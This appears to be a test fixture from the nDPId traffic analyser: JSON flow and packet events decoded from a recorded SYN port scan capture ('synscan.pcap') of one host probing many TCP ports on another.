+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1106,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1097,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAs7xUAADUGJF2sEAAIQA2GNIzSI4LdUoMYAAAAAGACCAANDQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1107,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1098,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3527,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1107,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1098,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsB\/UAADcGCX6sEAAIQA2GNIzSDcfdUoMYAAAAAGACEAAayAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1108,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1099,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1108,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1099,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAscu0AADMGooWsEAAIQA2GNIzSA+DdUoMYAAAAAGACEAAkrwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1109,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060177,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1109,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1100,"flow_packet_id":1,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060177,"pkt":"ACYLMQczACWzv5HuCABFAAAsEGAAADoG\/hKsEAAIQA2GNIzSIczdUoMYAAAAAGACDAAKwwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1110,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060177,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":255,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1110,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1101,"flow_packet_id":1,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060177,"pkt":"ACYLMQczACWzv5HuCABFAAAs5+oAADMGLYisEAAIQA2GNIzSAP\/dUoMYAAAAAGACEAAnkAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1111,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060177,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33354,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1111,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1102,"flow_packet_id":1,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060177,"pkt":"ACYLMQczACWzv5HuCABFAAAsqIkAAC0GcumsEAAIQA2GNIzSgkrdUoMYAAAAAGACCACuRAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1112,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060177,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1112,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1103,"flow_packet_id":1,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060177,"pkt":"ACYLMQczACWzv5HuCABFAAAsqRIAADQGa2CsEAAIQA2GNIzSBBrdUoMYAAAAAGACBAAwdQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1113,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060177,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1104,"flow_packet_id":1,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060177,"pkt":"ACYLMQczACWzv5HuCABFAAAsXYYAACsGv+ysEAAIQA2GNIzSBvbdUoMYAAAAAGACEAAhmQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1114,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060177,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1114,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1105,"flow_packet_id":1,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060177,"pkt":"ACYLMQczACWzv5HuCABFAAAsMa8AAC0G6cOsEAAIQA2GNIzSAZbdUoMYAAAAAGACCAAu+QAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1115,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060177,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":22939,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1115,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1106,"flow_packet_id":1,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060177,"pkt":"ACYLMQczACWzv5HuCABFAAAs1jgAADkGOTqsEAAIQA2GNIzSWZvdUoMYAAAAAGACCADW8wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1116,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1116,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1107,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAsX6EAACgGwNGsEAAIQA2GNIzTCo7dU4MZAAAAAGACBAAp\/gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1117,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1117,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1108,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAsYDUAADoGrj2sEAAIQA2GNIzTE6bdU4MZAAAAAGACDAAY5gAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1118,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34573,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1118,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1109,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAs6TwAADIGLTasEAAIQA2GNIzThw3dU4MZAAAAAGACDAClfgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1119,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1119,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1110,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAsEGcAACwGDAysEAAIQA2GNIzTBEvdU4MZAAAAAGACBAAwQQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1120,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1120,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1111,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAs0FQAACUGUx6sEAAIQA2GNIzTJXrdU4MZAAAAAGACCAALEgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1121,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1121,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1112,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAsMh0AADEG5VWsEAAIQA2GNIzTH5fdU4MZAAAAAGACCAAQ9QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1122,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1122,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1113,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAsi4MAADAGjO+sEAAIQA2GNIzTG8LdU4MZAAAAAGACBAAYygAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1123,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1123,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1114,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAsv9UAADsGTZ2sEAAIQA2GNIzTIqndU4MZAAAAAGACEAAF4wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1124,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":89,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1124,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1115,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAskOIAAC4GiZCsEAAIQA2GNIzTAFndU4MZAAAAAGACDAAsMwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1125,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1125,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1116,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAsGKMAACkGBtCsEAAIQA2GNIzTDfzdU4MZAAAAAGACCAAikAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1126,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2399,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1126,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1117,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAsJZ0AAC4G9NWsEAAIQA2GNIzTCV\/dU4MZAAAAAGACDAAjLQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1127,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8994,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1127,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1118,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAsJmMAADcG6w+sEAAIQA2GNIzTIyLdU4MZAAAAAGACEAAFagAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1128,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1128,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1119,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAsp1gAADQGbRqsEAAIQA2GNIzTAyDdU4MZAAAAAGACBAAxbAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1129,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1129,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1120,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAsNHwAAC4G5fasEAAIQA2GNIzTF9XdU4MZAAAAAGACDAAUtwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1130,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2170,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1130,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1121,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAsqy4AADYGZ0SsEAAIQA2GNIzTCHrdU4MZAAAAAGACDAAkEgAAAgQFtA=="} 